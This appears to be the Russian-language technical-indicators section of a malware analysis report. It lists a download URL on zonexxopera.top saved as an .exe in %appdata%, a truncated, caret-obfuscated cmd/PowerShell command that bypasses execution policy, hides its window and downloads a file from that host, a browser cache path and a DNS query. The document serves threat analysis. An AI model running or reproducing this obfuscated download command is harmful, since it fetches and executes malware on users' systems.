Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^e^rSHE^LL.^Exe -e^X^ec^Ut^I^Onp^O^LIcY ^B^y^P^ass -^No^Pr^o^fI^L^E -^wInd^OWSt^Y^l^e^ HI^DD^en ^(^NeW-^obJ^eCt SYStE^m^.^n^E^t^.^WEb^C^li^EN^t^).d^OWnlOAD^fI^Le('http://zone...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /c "POw^e^rSHE^LL.^Exe -e^X^ec^Ut^I^Onp^O^LIcY ^B^y^P^ass -^No^Pr^o^fI^L^E -^wInd^OWSt^Y^l^e^ HI^DD^en ^(^NeW-^obJ^eCt SYStE^m^.^n^E^t^.^WEb^C^li^EN^t^).d^OWnlOAD^fI^Le('http://zone... (со скрытым окном)